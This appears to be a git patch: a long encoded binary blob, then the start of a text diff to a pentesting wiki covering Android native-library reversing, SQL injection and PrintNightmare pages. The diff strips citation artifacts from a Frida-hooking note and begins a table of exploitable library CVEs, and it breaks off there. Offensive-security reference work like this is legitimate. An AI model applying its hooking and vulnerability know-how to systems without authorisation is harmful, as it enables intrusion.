zl{Cq+?#yi-GU3MyCuTB)FGN5hOpX>UT142+ahJ8mMn}V_jA^B!Y22J7x0NXC(a02m z08icmA=eQ06Exz^=wu1Yf>gSrKUQE$SebZi3rLV_*Hb|=Fs+K5f2rsF3Nga(BoWYx zitcJQiG5Yo)hpON2*p5_G0B0Gmuv&Pq?oSwxDXs{Ct$CD_oHSR-)oT8%7CMIMP;R` zoR7P^qQGDAlg#?ZG-qF$Gisb)f5qy_mu8<;+fqxYG9+DNY??DuOBIU0{eA+>DE2Xg zB#0Tr1{fpm4d|Xra$$c|urytkt+LyjRr9KqNvOZDJ4qULPZ(v|x4p#5Iu_%6nqH&yO^I_bh*7mBAw)*=( z8tC3}LqVLh=*`{{LwqBt?NUJK=S?6rSq20D}W0(y!x41upaP-3NT)Efd)?zgmrGTEI07+8=URW^w6q#*TBVnYZDyyG3wV{nKr?0@naPEXUI-uok$xGN*}hqd^yN|SyfFsRaAswqOnWX zbKGt7cNKZ{Afa>e^BG^h)OgjG4dl#qT|G1OPxveI9p{|qC03tL@#RdMQQ(ot)>xzJ z1SS#*0~p2OZH+r$;!M?Su()})p1mvO2Lz_D+)q%Ji>3lB86D87(nMP(pYTD9Ur|`S zN{T=wINAxM0=n_tLbiqDneqY+*kW)4U_d~)a%3=pV-Dl0;NF0^s0@|*s$@E8 znH}=ehwX3z29zcrU}#20cPgkdj$}@Gxa(_83Sv=_FW!|cc1x~ZzilX6#dr9SsJPtm z}#;5)93jF*7sIyLRNvl|xMmsuNn?26_N1c0;*= zKGho6yjhU254>y%A_Qtr$DKDlb<+9iOmF0p}zjJ7SPfSk5!Ii!r33fgyr3nh-TRJI8gJ+S*Ax zw75T90C%E!1VX!c;FX90z~K`GqLPvsnus!VbLeUIT-Vhsp5+%8cP7JFV@=-9(uach z*gZ~j2OX`Ey<_z)^YO7t$2;DbHpzGW?_mAP>V${k0*jWCG zH^4vS;o(vILS)AeWgI;*?OYFg4zQ({#P~ogK*l8CCIQDL{@oz;MOEYOIZEsraAbjn z^@2D(UGDv$Bb^7*1F=VKm3@FK;<3_1eYzune~d3~V6hX?4X*6lKqqUKfXM`hmbk*< z;7qJ)tw0#36^5K|2YC(hWDcErqhkl`HrRf%qe(iY%-W8{rJ#oYo zVGelP`2ZA&qmC0}>T=wWtnH7m&!A+cpZl1tW`C$r;oh)T^scB3AN(Y!a8}}>X-_&~ zO%#yw=@aclaN>o>7dj6=!Vz{2E*=%&CAJ`mFHms=f=%E{Zf3OxIz9dM0BLSu4bH=` zYY7-Dv*A}oELPadPpYd=;}|0b6AQ7WxY1s_ps-(n-e?aduC_E+2gd-xEF7@}+s?1A z*HTncy494&Nguy;HYNxmObc*5o@cNIX~C|-n^>ojw?u;btT2jIVlZBds;D|lPa86l z%cd=Wdi8vGb`&IT4ou8uV`@p?(jpotnlNSFNNW!eo>v+g3eY1Tgj0}O0u{Be1M-*HlEoP{@1%J}u6o?~1-ECxO< zPXgJSL}Oq7Zf)-l&TMisyEdheSD)*M3>c!+bPwhJSkX%B?Nsr{H+k(DtA*4qYej^& zn3|*Aqfm4|tP&Kz6)-k?vuob35>TF5m;8Xig(sBsbA0Hbtfsjx3Ztm_~>WYf5%=trW?#E9A#kX;= zslJs^vzhbjD0k;gtGBaLGI{J6yZSx#i}8fS*`3t>R7d=7yx*US^!JOBH@o(~e8=V$ z%7R*r<(y{jowOBo&mO_zl#8~cJ)v}1YhNwBHYDx)af9;fX;aU)l5A@Km4CIGY;1A6 zQT(WtZ*PBcxn={z((%n~D&-~-lXC_~%r%$ZZp%FI(jtF;LLNaen$AUod z2~F}GG+h{ZUByThFm!@0!RNr;(2R%5ZYD`~A^}mjc|b=1$QO5htmen>R?(XgtTseX z*pVkRlUmi=E@eWABn(5y4~UByz_2nSJ(_`Qe>BzYL&(~t>FXKvN)}GCn(`?uf z|MvX_p#>`Pdjd)WFKL+}1;^%}Hf1op>11nckC+U_<# zSyxDLFi0oHFX`s>EO?O-YV??YYrfP*{53TXjc9#w6Lfm9t=VA~E<6c~Mv_qP1|0`l zTNFC>Ln5T}gFXZw#S8TF_%Vo*)Cp)6hb614tLxpJc4>vf7~>nFCB7?Z&V}Co5jrbS zq&=SBY!65g>of>Nol4qlcu9~U6%KCEcH;a-4BjvqB`K}w_*>IK2Tz0mh%hx^Bnqys ze^5}&AiW(*03r=MfBqVb3_IS1c;QmCnTlVwV;1z=XAVWp3G}xCr39CNK$)Og2omN7X-G?C8hsbB z0AD73X%QhS!N-D7C@xN!XVc&;y$NLGJMTL%UY!=6BuNk$9N~{Wf-o1KUjhCy9Uq4X zzp#YF5*lM#8bS*SiZqXOaDw(47(g{O=nO71G&h88i{7km@^i(Hat1tBNcJciLz43a zHhDllfl3IQ4BQT4)dHcXbt4oAet<@ngD{C5P*GDOzk9cHRS7p<1u79jq>{Qayq>rN z0vbfT4#W$U;hj z|JI;tVDFP>s>+BzFzNbQwiZ`ZZzj1W!BXWwUF!lq`6DEfsD1Km z#~r>KH+qnwxQGb5ypVrkIk>+{MclLHa9YChZQ0Lq07Q(ylX!u$1XeqxOEMU`e-eUN`*bLLfl<67|>hY#;8LqLjWUa zl9;jl17sYe>JX4|SPN~czHU(0vfDdC7wJ3uncIu-1A=b1Owd_eFD|2$7m@;982JU;zIW4cg&i&$S<|JHNu%C6i=9JMy6R)u)7y zuWO{Caw!0*t*B2B;xqM7)lA|KAjxJetTei2O^kky{=-hmjS_5sN!KNh%#3X(kHfg!&#%~xV0($q?g?3IKBiH>#KIybPwy_z08>~FK8R91sh!aNT?JPW`ys($k>p2%hfvzIz+!}=zrJJ<1tTZZPdVEuhJe`c zWED`vkhQ&ZDX|NW3f+rMeUgBlsD^I`e~LW70R<8-j+2VoS{MAQ*xM_6#}hqVou)%~ z+6k%30w?eo#2k*Wj{sqz(Akf1(W*exL%$l_qO!+3cI;@ym_$i1G<_7!$)65a>x@Uk zc`z1BVBYg6CT30QM_dv1_V(nMK}^P64Eu1Mia1VkcI$^%zhFXQ4| zuYFkcD$kBbR-oLiWVx1v)}7p$q*0RPfmO3oWD_7rd;rKLUj$QHDIbiEj8vRF zYi6cnj`%MS1c?C*`a)u9d$A!SgSHbDJSL<;?=NA8VpcYb0{CemszMz9yA>3eK&>H| z02>!qwE7rGJMxBxhEb>G0vX4xH>d2VnVQT(4yD?ZNU)T(5LhZ#VTyqa(CAffOZ&&qa2DLp}OHn#AqswYk(;Hq^=8L*-Pxtdz}nzJ;c(y)sqW)$BREO;U0n z2G^rgW#!Gpr>;TjFSJAD*jzEeNse;qT))d_hn8QK$y&*mT5{P?`PGG|KKx$iiZz~3 zjr>R7qZ~A9h}at|1Ez`9rVlco*BRB%^!aBa}Jfo7;yXA*ceS|!rq5x+U$ z**GUu;~se4j>vdM6C(XOm`QY;*}@>*k!YP;tCS0GGh?p<1lSIh5E*cz--7!cA)qJ~ zrAX1W>2^2U8ASZB<K79+e$nd+U6xiO!^M0CqS$Nl#+CQ%yT>_XSAz|mT+a-yls@zpPQE4 zlodU6RKB5GOOv6QP6L^r!2Y-&p=FDIS%v;MpHcg12U64w zOi|?y8ZB}Q;gRD}2bXiC+Vpf6(%{gi1c(kWW8EQLKT1|#fN989C&axP^^ zMs~Gn**NUO6i|P7lx|Es;$aS|Wut+E(dxepG)-T>`eQ0+74YF@+}EwnGC z?Fp{C&$GQx_@d_M2SXvVuZY5p9Q^pnJH_em_JKkWK-duA2KedIg-5BOMO?(>KJ)(` zHK?bob7Zn&w#rdLOaP;&DT@`uP$(+J2(KO=ElPX!+FG1Bt$+T;&sI>Qy{&B)`UDNF z>-gvL{Rd{lF65tIW{Q8U{@=Z0|`sJmwW0nz?H`Ob~Nc+oJW zeJ(EU&o3~Qr=^j}&-e2eZEPy5Di&X2VX3ICPS{5O^;DnaBr0dy-Gqtf*>Ul*x;q@OE|e&m29QfCneFNBZMzrv`NrggQ=T9 zR5bZ^wynJq|ChWj+sz}K9wfgJ=CxpLX+3B8`AF37VJ8J|vt+?fLz@fEhYB&FZ}>$8bn(fa0l% zxf=!#L?VtmDGWTfyE2YDaIM8JTZ7>hTs(K9cd0=6gjb7c@GQL6m+)>U5?S)&Pz;m4 z6-+u}3*pi(Q&xISZv)HVj4+>P+i!8OckSDG=GN`omC=XzU?W&(w(IBf`Z@=1k>2?o zKtm3_m`^0RvfHDrw)FRUHItIcj0}#in{5UBfjGnCtzi=K8P?};Z@&=b0Eg;Au!F6~ z`b~)4BbpvUj;TUx)^HtI8ifKNaDFZ|$d^~fK?)?GM{#i;z}gDR%T;o4T+K!dh9F6G zI@f@Dz9K0tdknnT#ekaU@6{C?iYz~TCVxrK&STSg&0{^FlUy%Uex zMl!yO1)nRifWUM9f%D23V=FbLY6w?)yrEZY0YX45GRWHi=On6?*pXxSOAI^+DuTIh z{)-nB(6+crkV91fn2?Z4$-RVU;o{}Bki02$i_hcTR#&4@G*4QuQOw~Xue;ire3V}~ z$*fgzC0>fY^sLso@C3v#&km~>U+vA)wR)$g9X_)(zJL3+iJ7x7ndYtY=FoHXAsynKM#l9nAa4b znXka-PDaJ!IyIW5$koStI$9w>KOm*;Zt5YdWh9Z0?KUJr7-ZuX!h}Q;5?1Md6km*>)5M>o^o;5o)kEx+wGar;-R>R^@j4OL{8QZOZ7A9;UBrCR{QSV)~55|X>7pe zZiaSd^4eW9AmQ=`*qm`MyEf`wU8csnRtDjcyD2{cJkUK)er2!4cs3N&pw^w*)3Bq z241b5bt5Jw^+OC_&l{abCZftu{f@bnl{0qv?csXI43Vd!+S%sz>#w!57eI6Q;nxU z^{eI#=F%M*8Aw>f3V@nk-j(CXYF6=%WbY3?VXyKxSd@x zV$iV~NBZK~GYI+MUJN+aV4iJ3X5}J&etxjglhq#LOx?S9Hdy>PG>(`prI5T%56g1^ zWM)!G57v*)R5@~%xL6?Gc^mpr#Ez*BFQ)f2Y$1tX6k=`S()<)C!yWrYup204uQ%`q zmFqK&G1Zqaaq7ue0jIm!bIW5U-Hlw+XnHGlGAr0dGj(JJH3#T-I~4hA%T%$RF$me+ zqj)ruL0>oS^mG}2%AA5Wuf=Can`Y8-FLUQJ&J3UEtdbrbo|-?8kIt7o`GGC_+vS^8 zvCO;&JjB0D`h4wpB*pvv>T0^IajT)=o5#5xyY?o1-tNS_-}3uxzPHau&%KepOaDmG z9j}^i5)|0hCV1%axBk6@l56EIonI}%EO}(T#g&A>#mqy6=^;k8gHc=7mxWtRo?Q{V zYlrL2r*o`!xSaI)!v(OZ+1+~Y$=Y7N*(GV_+B?s4osebO|AuYNok9mczqz`BO^3-- zWp;to0@uASCJn||9P#%j=TJ-w-ZadiERjjx_v*Qadeeo`ZcV1IAN0J8^grDlGup^v zFv$|=(n;S(s~qjB*gd(mk;1zHYq;k~RC&^fbJfX{$NP#aH-uD3oMDprDmf>CNnSYY z!uJhKnrtNr0dZ}%wFLz;30#1i2+oI^-$u!5g-7oTn2e&{C`MWI19``CT3X!5GJ1ie z91D`x`jEJ6*4Ilk-* zBo?48x3T}dl9%%FDSIyzQG!cUL+9&T6IzQs-tinYx@Yq7U2a8&>AK{Spc6N5M}J{S zE4CNo>~|M>e6sNDhma-S_Z7-I7aZ0~@($9-I=Ifbq1Ec!g_T|Vzezjamo%S?L-)&< zSNg1@z`V(>!y!$GC>W({lmft>h2KZFbkJ<+p2Cs(y-|(8vw=m5= z`{U%IdMU4J*2rf5R$NY8k5kJIZ%0;~Vg=vlKwk4n_v z%+Q;aG=3$bEa}Jts#w_IyHKgq?S4LjJ4-@KI8;|hwjKO>G-uaSVF{s;7Q=5+>mT%Z zas}@&ZQsl#ENxz9xfZ8w_*}#zsZCD4|NQy0Qu*xUtaQDWU0oY^OwGd%Ol-1EIl4t^ z#E!4-kmRE?UtBg__qOgkRp3>t|HZ-e&i+rGnx>bFC)z$5MMliXy%a%r3MzSOC!O_< z<#tX72sj0h)%-C$OuYQ`cI8I!G4>*Mav~GdFA{k*&!~+M#)~_$brB@NFia>a& z-6|@q8+6j0(Mq7;6B5%>R$d4;%YG;U!jh7F;O-11V zKZF$mXsW$|h`m6YN+D)>#B!ciMOw%b|EJ`ZTLLbv(?%0#3A$gWFbga9hV=nr|TJc$W8?q~^H|&cWz2eRb zlw{wT7TVFAJ*&km0;iX%@iv4WH;A6KYZo(|YWGl%aJQNHYIW~-T$aMSbg2=rW1fwM z6a-0o0R(``jumEdBz%iduHQAGU9mPmr!f~EDr8ZSHV;bQ2P&8a=;$ye1{A?b`SAR; zXcbIgo0tAPt5A>gDr3qXCdp9NJ z<1@tbBt^|PGE+dVdR1ClfXYyKiwgK$k53dW0AxW3*r4CeBzBIdN?O4H=azjEqYK^u zNxa*;cP}ye!ch%J#bU@_0|XxDCbow0?hav%kD?>#(a`X7LMZN;q;2&4e!Iu&gNEO$ zn4Vf46Z}{rYAeud{xHQqb^gIO`%gH2)y#Gt zjZwW!Y#$8HJM`x5Bb)Ow#givJn^j!GjgKxL32J$~K#bMU`CaI_{5X|uLR-eQ-q6Pu zUucvqoMt^~vF&BpimmT$`&DjysC?nf++liFW|`ydy4F{0TjVeE&K7qJQx!E%SIlu^ zDsuMlZEYinqS-tk9HC0Lb2&rjBg^R$J>)90UW>tbnY~IY1}-FcT9Gc`V$QfYHX-Ia z!U%SSc$tjb^73R>AH3_l-)E)tNx(wjirhf=wg(Ry&Cg5dpHBuR#l*Owov9yM0X7O- zr8(gMlE7KQ6#)0(hO28U=3v;x8z2gaPJ2$BvAZl;c*h+9d2RJgbEmH;SXjSle){P> zb6ZlveRjF4%CQJdO3(IbtZ*`&c=Pi%m{&`x=|)6r2&0f`o25y zBVj;vng6=!Z~s9TwX+Q6CTe#H|T zSX;aI#rSK^q^zJ4j`)1|Rn#pYd39MtA}WQPPedk#U6R?TmYqbDTGC4_%Sa|4c(e zO5agZeY^f4SYd-c0J;2%c{5Sa5Oy;5R2aClWUh*Pnpti!2Hm#oS+KAa@}Gy28d3%V z{(TXneFUIK%5TgBD9(879-Y4gFi`wsIUp~SeC|jOB%U*buSo4Ws6=ES_5PwCHnQ7d+| zR9kac*WEs@YW8C|nj-Vf6D|L2Caq}^TMYc^b;m6aI1Z}--htk~0^*jq=3=K~U>M_z zwCNt-EgIAFAp|A)Jvf%afTOmi_fKA1{uw}=#&(G~5tevxFx1=n@6Z8X1yFBi57JGR zHBRuoTaz=|cBtXW@zH_$W~ z4=r2o6Bx)vWL{v>kf|tPm||XUP-{eBH2>hIw)Ak@eyw(n+|815DeZ2LyOI{({q&k$ zQ!lzrt&{nEXQ!uGvuV@QHGu+&8?}B^vYnK)h#a-st&_~NU5DfT+^0qzsX-5$kAK`8 z3}%QL16C0~-5d^x0ffiGA%Q)XxkFrFpSohh5YIUzivgCu zb!_@uTS?{Risddt6la{15&OKjl-dI{dI2rJC4msu{A2984?8`_I!dg%o@AcSJMh9G zW3SRP^xqizX7Zl9u zoiW%Y2I>%MO5?=%kM17sarW5`Q^Aq4TJK7ma}eh2ru zPP*w;d~5e~4g)fVx26dID_IN_pf55bG4Wpl zM&jEJM1XLITAM$l(XK1=p&Z};Def!7qU!d(K?H*`=@3Ll8l+oVq(P)RM!KX^Q9@z_ zq`Rd{y1PM|fuS3uJLg&4=RQa8bG_H|;r;Nw>jSgd%r!HMz1EtwfAwEw(J9?mR@Mst zi*qb3;1G0F8nLdSo!a2|7yYJq3wxi{mS&LAvL&z-Vgt#$ede&Of0ewnnyxd`^~OqB z`^K3O*uDT$*&}c{TF~C109CgrKtcxq#L30OGy2--x*7~f1G{a!O9ft-kzxS{S4k?D3Nd3UHN_hSYP=t_Rb7eih3NtIGuPk=m8a=2Zm^%E13PP0>kO{5zg9L$+ zjzBt%j&dEIP{v^u1fumRDYIpO(C3 z1pze%5I2B08K9cb+~m35ncP<}nwXfl{wf1(4)N>@twR<2Z4}Fn|GbB`4vEI7r>W;H zYmtnc%*+GZH`pu*Y(V3qN&6SI;`cpa;Wxh+l1=yWuR;2sAEn;^i>mkUXZ^3r-~S)a z5tf>01GJ@z7Vh;m04*!9x0hS?Up#V(i--i8(>?Nnb<++i`y1n(oomWtfU5qpnfgh+ zyuSPR-LmfdTbuOnbN>&|)aHvqnQNyeRTEV+CS1Nv3+XyKx{<1-Ot=hF&UI=BmfAGM z?YD+co~9o^a5j5&dS`Z!_x8cNj~N(kV1D~3&^;V?Ao-X@+_dw`z3*Ss2bI!K(p$Q|qTFt^3!jUxreQ1%h zK6NxPcZ%1w{c@yc+H*Iw3ePUk__*-Ba3Teo&jXlJ<)aU(OzAeuR(a971GS?DO5*bwukpt{TKO@XPvf+e>b)OzHp3C~&Zz79xpXGg-hd zO~iSFEvDft-o~k&3eALj5Tf)sQ-aybnantk6q}WX)wOsq=TRm-*?GpHPpTMk)Z}qf z+NMGWO?OK{YVR!Jd)y^X(#W=)vi2Cq`paiFZ78}R5 zFFIWtC30nxOCyO(Ypv`-d?Qw7LKL(6O+FF^J=3LN+|hW^@uMt)pGBlSGLy+;!#Xzg zC!VL_+S=9n)9Ynp^`;kCv*OFmELE;VeerU_YLZwVrxSfPthQf@3RC7=Y(0cR!&!;CQnvt0EIsy6wfmvu791=huM!Uby^jHv|-L^3N9=@RNS7 z9Hkvz_F&J7V#MKoumoi8Y8NRoIyiT7F)DA)>xeJO!uxZnnCZf^KYt)7f5fT)-;@s( zYqdGeUTKlP|MO~F!AYJq)`g%4W-oiG9>N_bB6z4}z+2_X4HO0yr}K)W@L-ICX(#e+ zd)el^$;#*c7ue_B;(8h7&weDMmk5P1OFzX*#!Y9`{|l)2_uw104u7WKea|kcY!hYM zOR9seOWa|uJNk7a_T6t)ZdoQLkCuU{TZ# zJu!DL)PE~oSiz3L)O>w1_fmQLULUZ8tb;8KT;4yN8r<| zNVj6k$b=z;hB-=>`Yy~eOk9o2RNqF#Offh{tI?PekLzbetL0bDEaIf3%-`sG!Q72R zWz2n=6Loxi>9Xr(*QYtgJ{HZ5+vn&pmK>Aw;q`|(EEAQ_vBEC*w*2EIL z86zip%m|>J&x{nXJ+qPJVH>7aR;J&}7A2)EzxAD2oq=|4R{{SDorKh@34g@-sBA7A zr}M&9048y3|7`dP?eb8|$Ps>7VvRJL`NY?QA^$X$txmtXUC{!rFNd!lDP*DDu`=m8 zR_1^>CuU6<3V4*Envr9-&D4|X^^4t)jkaQK)&KrWsMRi$E6hFJ=$yMxd#9m$$a>`R zCCf^eG9^pl7$KgZ1U`4mZE&92;0cLXd^ zID*N!g@SlWSrm3$`WV?w6-$nu7#Fy~1kgQ%feq$&vwVWVDqyj_2tOC3e%I`gi*RG9 zk(!Hi-YzlfcDA%SGafB6fpWQE2ot%#I$lYsJZ6HPtL(R~R;kbmVg7;$Iy?xbo}JSm zc0{ZZ4ZtLHG#ZUH*a*>}4^yM&AT!Gy?CNa$;Pi8JfnFh8@)FzLL-WCHEtf{4PHV6ET8X@JvJ9(G(2_bY$34ygdFPcW>m@<$gB#>(cf_AkDeFy&J= z-ql?~bh4^-iwFFdYfP71chT%N1)Ro%Ia+bWQ%D)F$z?WziShUpmk%lfN>F3XT0S98++ zcx$vC(xt#YjuPu^Rn+bR|AG zC>3>6JAsbw&06o}(_d~c4%tWJd!Fp~h);XC+<(07`ZeD;ziMWUn+E>8fH}&VJtH)9 zz5|Igf6b#KhUrBLQ6sqTWwkjmoHhB443?j?ZlK_{uPTK=MO43VKQ&`JcV^2&TOT;e ze;!j`8<;tvZDiWB=}c`)rgh9G^r|G|$2)lNPl$^38yE`Szqdo+F@)H!)i#s?>EWk= zwjnrwFDNvQk$av)BaB*MaOG#IkunpHX8^_ zZVzaNwlOVCFqfRdE_PnMTtiQ(gzHDaEgsR>aWdETj^Jz639PJ7nBk2xwj-gkiO;L; z{waU_4275ZUy`2xOjmSn-u)(A-@*`2CmbBhK6C z4gWW1lst$%wJP`2VIsemg6pH#&u367T(_skT&@c>|Irkw}`a)xwoh{VQox9W|2`G; zR9muGu-ya?>wDw(rF0#8SALpHlySV~p5XBBnt2%Prkbbw*dG3y=+N|MU%QTB_D1tx zz7@Z#c}b`-Jr~~FyEaOd<2Ui3KH~UlB)Tf-3N}Kh)?QJ*E*w+<-PvudA#YF!!Yt2w z!yUZ8OFF`=Lfink6Rgj!w{zFH$4-tlH~LHa@4=e(9zes_wQYds3W$>$-m%^I8WJKT zE<$>a3p&uxC3EF`}S6R+AJJ zdL!}h5Vyx?ubU>f{q6p!ce$O^5RcQ??WEo$=*gBfwJyc_2NcuMj)bK*>7nodzh{*z zLye!O5?PYBdxvw>NN4aao%beH8QWdNqK8NbLpi7G4o#*U`4YDn;{)6Ei>zlGPyra- z2r%FM3yYb$crg5~J$)dp*mLS4JuU4T0h-c2%4y*tDSRh{1?@{K0T03EHVUu5gg=BR zcJ};Ou;${jrwmF<3##j`H!#lal!rm{|x5QURNI^39Cfh^a)Se4WR8SYMx5`f(yN6gjcFzjkjMd-y)q9C1 zS7<$8X$zeh`uI!Q#G<{N^5pF&n!HVEOxnp~U6@86zV9uTjE%PuZjOQahs#6_d8rZu zMQtOIxPM_E|5~YOz5qWHSQ|iOOm~rcXXrEFRN-nb14cq{5~OG|>N9a1xgR_T2wtp` zN~jBQ)YfQ(&yUE3lS>G3fA&rz)sWm02r|;p=eC)JWW3esbI0}UxnCXq6IY)*nxS1% z6-mE&fnlej(;v49LAER=Tj`VI%k=E3Ub*F==OEcXayl3l{GxA))9(BFfZJXdn>8lS zU>UH#Ft*pet=2!DzoZdzi>%JS(68;LV_xqfWOCrU&Bz6DcLX{$HQ9Xm z=^O!`*w2Mzt5??6A}f;M#+pRHZG4Rd#Di1w^KZ*h=7*bA-~6$_rh{{wzQ5sGdB9(` z>FRCy0k#{9{zAWgVGVWj-9(ar49`rvt45eLiec_D@uT2#XlVHoOb5uM6<&34aH9w*bZ}oJOic!k>;s=hA;gLM!HmrDNZ!tUD>RNTI_kw+$8B-okKCORN$2Io#m(gJ`Yp$yS zRbwxaLO~g>heg}&rin!3WEeh6THEaitr*!2@q~&>{vk(0EkjH`BzoyzpxnQ{JvhGs zbQf4?Y%BMULxG*i21H0Mj~lZQ0mG0UkO+uvw4^ig^HMRN_u6Z!Ax32{@C$ZC0vg}j z*4lpGN2Cy^wqs`)*a^B_PO|79z4o}Yrgxv!h@GW%ZI=W+eFp*YPfBW0_sp zjK)9BowS=9SS9>o4LaNxoNwxoSX~IQlWR-tK5ewZQnEbG{8;n?^-^bcDH(FQ7$&2V z?G?bB2`8k*_<5Wle<4TqEcsI<6!@N!6Vpvg-~iI3SMxP$n6uW*f6s);V3{r3ukGMvPfv8^Iz23|b7-h#<2ry?cyFp6WJz8B0+cjT!*Y_ElPKfz@pW_M5AbV0 za`Ae_kFP%O^YIyIG$JnW;TLOKEr8owlba9Y^^kOE)+rqKlQqBU!Jjp^;iEgElUQ<=Ml z=F92Hu#$3Qra7<6r#xikFm zI+*QMVg2}-tj}v01j@0K_w%2*k*XBum@Fq2?9G0R=~1nZY?go(F2rWu*?sY-V#?V7 zJrSw@=Qu=ifdK~$aEovclRGmA0M7#r!E<#8hKeN-Z+H^9_S{f2{&rYqKJ=)XkdHa* zmNMg%hlA}5QA0>oY$~?)>^Z5;FXR>UTIgJ&HJ<_+o=zbMN;o#rr>?txl)iRoM#V?WZZ0 z3J6%xyv$(hDAmt-x=Xz5t_Aa)nu$TE;kLnT9nEPpwkR@1t!pZGV%d$X?Vk>1xM%!4J zTWf0*d~o8jhKf>?t@6BLZ|qJak2k?I_lMH@)+N=?Wl3@EvukphywDAM1H%r6J8nyrK#Ft6by1@@#LW&B^1w%fj-M?a@{fCE zyEm;pChq<6)S-}^g6E9H@e}&o-k3h+W^GKgclWX9Fm^-G%)H9L!d@ScRu(!Pm7)toPM?+kfzq+n<{W^~yzd$}C zSkh=KS6Q<`_7}9EFk|B(g48;FZyfG!h9aGJo7Cmuh$i-%yI9ay)wGC5gWg_U;(^og zgwtcOwbceib9}KKD9q?A%WJ%A1oA<&kEeEi@yAW?D&UuVQ%y->Vt!IXnjb!~`;*to z&eQBTrGD*TvnTqLcd8ARq8;qk+;%0mQc~Hj>T|vVb`Ly9nJdZ1QAcnG+4MMw$E90B zRQczgMZ36uJoiV&vZ&T^x^o>qC#NIn;v+l<9_P2&v(s#N9#)D^V2q@RWUBwb&c5R{ zVhVL$^x&}IYE1S%y_x&@?ft}j@|{ zq>AOUhgp(8!0H7nS>Amah@xz1*`nZQ9 z|B)3DvkJ38^+}u>6fQa{6}YH+SY<0Geh>t4X;sLTNb!43`pT(W)2LcZPq6Vz`<9Vp zce#^A5-0bx&>49Tk~#XmfmJhWVkD6%meJ7)uHMCaHm%9e*2o(b&^?qI{+#9PU$tj( z#_X%jT8ZSd9U)G#@%^)IJ?867^}e?R=r5f6<wvtx)i2Wlf7W$#B__bu^qdiZTBhUyFw<1 zeS)Xu ziFq$Mt#dU`dH?rEa*+^OfykIGItB~Sc?HetT-86n}?+BCZl|;-?ID{ z)UMP7O&9&>NT@tmVFj1u`u4FOvnjEiZpqE2CPFkXX1b2>dFDpu^xQO`v@52nL=RoO z`Of*(*H;$WFiP-bdvE5mGBCn}R5AJQ&%OnTKLvN!ty?*{1Xw<9f*VFl0iQif76WPx z`(5N98M|EpvG2%MTZfns!b@GB3nJ{P+}ewK^KQG>QUj5dkp!yqAVgb^)ijw&%2QJ^ zw#)izKbh^MENOI;ibSTNxtyai)fGB3(v$kR`|8Vr;%%(!8qhAsTkcw)>M@#2Jur5} zwzPcgCX-=N2PQ9)n{Tk7=36uqE}uRg($*CF__(2~G7Ngx2HU=MXefTX_I$rqRG)dy zR2tk0ZVYWqSTZLEi}4{xG5W?y(pu;j)5S2FBrp_;HlLhL;_o6fJZ&dTAxl4TFKSr( z!+zTA-bt%GwQ^|Hx}?;$2rdch+3rBC8^VVyzEAj4Q0&qNAwIB= zkt`*YeB^q7?9PZ9GSp9TDPjC^%o!SypfKw|%a-mu)$3OJ>mJ?NT5{*SN%9WGy;*d!ojxAcwVKM&$z1QVUx=ftK0dE68 zFsXy=ppVPY=-nJ2QW!{lH8@=PbvZ6qFn`Vr|X8^P8u-B^yzeV)|WBP7|F>i41Vv*7o-4`mJ9o zDm1HCEnBo?PIZNtEZ3aUztkDaIA+uihp0@iYJS?`^ll-Qa&kKfh$BAcImTFY!$n`> zJ33%fWWb|$xTQLOYCkoz_-ZMaSgqI^(us4+%5yi(y(2*p`Cn+n~XTKTQHS9xAtG8<@(kY zA=PK-Hnvyl(^a)}Ly`4uVG9yNF0yyG>VyKFTnXh$?a``U@b4LskvrltKr`pzKj;qW zD&^UaD{U>B^WtGF$1ACPqvJD@Uo4Hry4a&cu4J0cl!_7y3h*ywbLOlTBHfdGvJVIc zz3&V~?u-q|EytyLRIcQ{uG=&wQ|r}OSl($Lz>>Dy8eZcLJH5|dbmeGLH;J7=6zF+Q z(H6KVe7UAQY&C=j<53Yr+TUFT!AJjYmh>Q9_Zn~l)ml(B^KbTPKQ<|W12dc60H^qtJycN#ZiIn1h&>eU|MRjj^?A8mtny zG*D1VA^MOHwu!d*cFpf8QRhEBl7G=JyX~d(@~ToEC$cX!78M_#Ra>Tt^`hu`9pN~a z+-FN6XT@h3JA=ipgwuu;`2xLb14TI6aKX2K!`Sso@_Fdq8Sbrtj9arE@dn(d`Bjbv zXM^T&os!Ab;qU5KV(G1h%mg5j*o3A`)z-&UTL7nEU4WaT?H628wz;xz{D_5)>f1@A z1533=pAL6gLHw&~h-snWrqYk+&&B1`nm^(6%R}~5GT4~fZ>s+LLWqhkk{bf0*>%V@ z$gToGV<2ns))Pj?V6fx^V|NdbGy@MM<4QIksBJNtV$9-addZgb#FF5dur@wJw-_qu=m_4RBSik1|~0K8ZnJ=7U1}2zMQv}ePF6VDXznW+TkkhaauydM= z@E7>QK*u%ndWj#4=Gk2@yFwfNOFrtFOIDUUc(fc_{ln?3s}bjOTPTe773cej#R+Me zUS00XJ5pB7$`QJMfJPw*@bU!Qwp1WEgMK^t8`>?X=Sf^5G1fe{U~9dilX&WV-)4oy zvC2w9lkx92yR)QB-rPV^+KX^f1Z$vw|O5^&8DOB3-I^&i}-(DLGNVg##AMU6AH!&S4;*t{?Kl z9KIKG01&uBRr<(&Ws`rPz<^;yV~&;vAsu1BxDQ^`xFq}<@&=!|1Rhvk?il^XjP4)A z%>7ECC~0a?G_lK-Kr#3l{VgKH_$TO2Ip&+&Gv Date: Sat, 12 Jul 2025 08:24:17 +0000 Subject: [PATCH 5/8] Add content from: Research Update: Enhanced src/windows-hardening/active-direc... --- .../reversing-native-libraries.md | 8 +- .../ios-pentesting-without-jailbreak.md | 2 +- .../sql-injection/ms-access-sql-injection.md | 4 +- .../printnightmare.md | 102 +++++++++++++++++- 4 files changed, 106 insertions(+), 10 deletions(-) diff --git a/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md b/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md index 03213da50..ea060841d 100644 --- a/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md +++ b/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md @@ -61,7 +61,7 @@ Java.perform(function () { }); }); ``` -Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+) as long as you use frida-server 16.2 or later – earlier versions failed to locate padding for inline hooks. citeturn5search2turn5search0 +Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+) as long as you use frida-server 16.2 or later – earlier versions failed to locate padding for inline hooks. --- @@ -69,7 +69,7 @@ Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+) | Year | CVE | Affected library | Notes | |------|-----|------------------|-------| -|2023|CVE-2023-4863|`libwebp` ≤ 1.3.1|Heap buffer overflow reachable from native code that decodes WebP images. Several Android apps bundle 